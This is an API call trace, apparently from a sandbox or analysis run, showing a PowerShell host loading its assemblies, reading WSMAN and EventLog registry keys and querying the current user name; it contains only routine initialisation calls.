	[0412.962] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0412.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0412.973] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0412.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.979] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0412.989] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0413.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0413.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0413.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.381] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Management.dll", lpFilePart=0x0) returned 0x8c
	[0413.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0413.394] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", nBufferLength=0x105, lpBuffer=0xccff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Security\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Security.dll", lpFilePart=0x0) returned 0x76
	[0413.774] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.774] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.774] CoTaskMemFree (pv=0x1edb50) 
	[0413.775] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.775] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.775] CoTaskMemFree (pv=0x1edb50) 
	[0413.776] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.777] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.777] CoTaskMemFree (pv=0x1edb50) 
	[0413.778] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.778] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.778] CoTaskMemFree (pv=0x1edb50) 
	[0413.785] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.785] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.785] CoTaskMemFree (pv=0x1edb50) 
	[0413.788] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.788] CoTaskMemFree (pv=0x1edb50) 
	[0413.788] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0413.788] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0413.788] CoTaskMemFree (pv=0x1edb50) 
	[0414.168] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd238 | out: phkResult=0xcd238*=0x2fc) returned 0x0
	[0414.170] RegQueryInfoKeyW (in: hKey=0x2fc, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd13c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd138, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd13c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd138*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.170] CoTaskMemFree (pv=0x0) 
	[0414.171] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.171] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x0, lpValueName=0x194120, lpcchValueName=0xcd1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.171] CoTaskMemFree (pv=0x194120) 
	[0414.171] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.171] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x1, lpValueName=0x194120, lpcchValueName=0xcd1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.171] CoTaskMemFree (pv=0x194120) 
	[0414.171] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.171] RegEnumValueW (in: hKey=0x2fc, dwIndex=0x2, lpValueName=0x194120, lpcchValueName=0xcd1e8, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd1e8, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.171] CoTaskMemFree (pv=0x194120) 
	[0414.172] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd1cc, lpData=0x0, lpcbData=0xcd1c8*=0x0 | out: lpType=0xcd1cc*=0x1, lpData=0x0, lpcbData=0xcd1c8*=0x8) returned 0x0
	[0414.172] CoTaskMemAlloc (cb=0xc) returned 0x204280
	[0414.172] RegQueryValueExW (in: hKey=0x2fc, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd19c, lpData=0x204280, lpcbData=0xcd198*=0x8 | out: lpType=0xcd19c*=0x1, lpData="2.0", lpcbData=0xcd198*=0x8) returned 0x0
	[0414.172] CoTaskMemFree (pv=0x204280) 
	[0414.508] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd188 | out: phkResult=0xcd188*=0x328) returned 0x0
	[0414.508] RegQueryInfoKeyW (in: hKey=0x328, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd08c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd088, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd08c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd088*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.508] CoTaskMemFree (pv=0x0) 
	[0414.508] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.508] RegEnumValueW (in: hKey=0x328, dwIndex=0x0, lpValueName=0x194120, lpcchValueName=0xcd138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xcd138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.508] CoTaskMemFree (pv=0x194120) 
	[0414.508] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.508] RegEnumValueW (in: hKey=0x328, dwIndex=0x1, lpValueName=0x194120, lpcchValueName=0xcd138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xcd138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.508] CoTaskMemFree (pv=0x194120) 
	[0414.508] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.508] RegEnumValueW (in: hKey=0x328, dwIndex=0x2, lpValueName=0x194120, lpcchValueName=0xcd138, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xcd138, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0414.508] CoTaskMemFree (pv=0x194120) 
	[0414.508] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd11c, lpData=0x0, lpcbData=0xcd118*=0x0 | out: lpType=0xcd11c*=0x1, lpData=0x0, lpcbData=0xcd118*=0x8) returned 0x0
	[0414.508] CoTaskMemAlloc (cb=0xc) returned 0x204380
	[0414.508] RegQueryValueExW (in: hKey=0x328, lpValueName="StackVersion", lpReserved=0x0, lpType=0xcd0ec, lpData=0x204380, lpcbData=0xcd0e8*=0x8 | out: lpType=0xcd0ec*=0x1, lpData="2.0", lpcbData=0xcd0e8*=0x8) returned 0x0
	[0414.508] CoTaskMemFree (pv=0x204380) 
	[0414.510] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0414.510] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.510] CoTaskMemFree (pv=0x1edb50) 
	[0414.514] CoTaskMemAlloc (cb=0x104) returned 0x1edb50
	[0414.514] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1edb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0414.515] CoTaskMemFree (pv=0x1edb50) 
	[0414.520] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd1b8 | out: phkResult=0xcd1b8*=0x300) returned 0x0
	[0414.524] RegQueryInfoKeyW (in: hKey=0x300, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd12c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd12c*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd128*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.524] CoTaskMemFree (pv=0x0) 
	[0414.525] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.525] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x0, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.525] CoTaskMemFree (pv=0x194120) 
	[0414.525] CoTaskMemFree (pv=0x0) 
	[0414.525] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.525] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x1, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.525] CoTaskMemFree (pv=0x194120) 
	[0414.525] CoTaskMemFree (pv=0x0) 
	[0414.525] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.525] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x2, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.525] CoTaskMemFree (pv=0x194120) 
	[0414.525] CoTaskMemFree (pv=0x0) 
	[0414.525] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.525] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x3, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.525] CoTaskMemFree (pv=0x194120) 
	[0414.525] CoTaskMemFree (pv=0x0) 
	[0414.525] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.525] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x4, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.525] CoTaskMemFree (pv=0x194120) 
	[0414.525] CoTaskMemFree (pv=0x0) 
	[0414.526] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.526] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x5, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.526] CoTaskMemFree (pv=0x194120) 
	[0414.526] CoTaskMemFree (pv=0x0) 
	[0414.526] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.526] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x6, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.526] CoTaskMemFree (pv=0x194120) 
	[0414.526] CoTaskMemFree (pv=0x0) 
	[0414.526] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.526] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x7, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.526] CoTaskMemFree (pv=0x194120) 
	[0414.526] CoTaskMemFree (pv=0x0) 
	[0414.526] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.526] RegEnumKeyExW (in: hKey=0x300, dwIndex=0x8, lpName=0x194120, lpcchName=0xcd1b8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Windows PowerShell", lpcchName=0xcd1b8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0414.839] CoTaskMemFree (pv=0x194120) 
	[0414.839] CoTaskMemFree (pv=0x0) 
	[0414.839] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Application", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x304) returned 0x0
	[0414.839] RegOpenKeyExW (in: hKey=0x304, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.839] RegOpenKeyExW (in: hKey=0x300, lpSubKey="HardwareEvents", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x318) returned 0x0
	[0414.839] RegOpenKeyExW (in: hKey=0x318, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.839] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Internet Explorer", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x1c8) returned 0x0
	[0414.840] RegOpenKeyExW (in: hKey=0x1c8, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.840] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Key Management Service", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x1c4) returned 0x0
	[0414.840] RegOpenKeyExW (in: hKey=0x1c4, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.840] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Media Center", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x330) returned 0x0
	[0414.840] RegOpenKeyExW (in: hKey=0x330, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.840] RegOpenKeyExW (in: hKey=0x300, lpSubKey="OAlerts", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x334) returned 0x0
	[0414.840] RegOpenKeyExW (in: hKey=0x334, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.840] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Security", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x338) returned 0x0
	[0414.840] RegOpenKeyExW (in: hKey=0x338, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.840] RegOpenKeyExW (in: hKey=0x300, lpSubKey="System", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x33c) returned 0x0
	[0414.841] RegOpenKeyExW (in: hKey=0x33c, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x0) returned 0x2
	[0414.841] RegOpenKeyExW (in: hKey=0x300, lpSubKey="Windows PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x340) returned 0x0
	[0414.841] RegOpenKeyExW (in: hKey=0x340, lpSubKey="PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd218 | out: phkResult=0xcd218*=0x344) returned 0x0
	[0414.841] RegCloseKey (hKey=0x344) returned 0x0
	[0414.841] RegCloseKey (hKey=0x300) returned 0x0
	[0414.842] RegCloseKey (hKey=0x340) returned 0x0
	[0414.858] CoTaskMemAlloc (cb=0x804) returned 0x1b784da0
	[0414.858] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b784da0, nSize=0xcd428 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd428) returned 0x1
	[0414.859] CoTaskMemFree (pv=0x1b784da0) 
	[0414.861] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0414.861] GetUserNameW (in: lpBuffer=0x194120, pcbBuffer=0xcd468 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd468) returned 1
	[0414.861] CoTaskMemFree (pv=0x194120) 
	[0415.593] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Services\\EventLog", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd168 | out: phkResult=0xcd168*=0x1c4) returned 0x0
	[0415.593] RegQueryInfoKeyW (in: hKey=0x1c4, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xcd0dc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0d8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xcd0dc*=0x9, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xcd0d8*=0x10, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.593] CoTaskMemFree (pv=0x0) 
	[0415.593] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.593] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x0, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Application", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="HardwareEvents", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Internet Explorer", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x3, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Key Management Service", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x4, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Media Center", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x5, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="OAlerts", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
	[0415.594] CoTaskMemFree (pv=0x0) 
	[0415.594] CoTaskMemAlloc (cb=0x204) returned 0x194120
	[0415.594] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x6, lpName=0x194120, lpcchName=0xcd168, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Security", lpcchName=0xcd168, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0415.594] CoTaskMemFree (pv=0x194120) 
